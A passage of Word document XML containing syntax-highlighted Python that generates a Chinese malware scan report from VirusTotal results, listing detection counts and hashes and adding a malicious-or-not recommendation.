        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"https://www.virustotal.com/gui/file/1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321/detection/f-1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321-1649578554"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"Scan finished, information embedded"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>参与样本分析的分析客户端数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>威胁告警数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"sha256"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"md5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"c31852836acbbec2101824999b482de3"</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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>record_dict:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        row_cells = table.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>().cells</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        row_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(key[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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row_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(key[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一级标题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>处置建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_page_break</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_heading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>处置建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dict_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"positives"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] &gt;= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>40</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我们认为该程序是恶意的，没有必要不建议运行该程序。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>else</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我们认为该程序并非恶意，但是建议依然注意程序存在风险。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
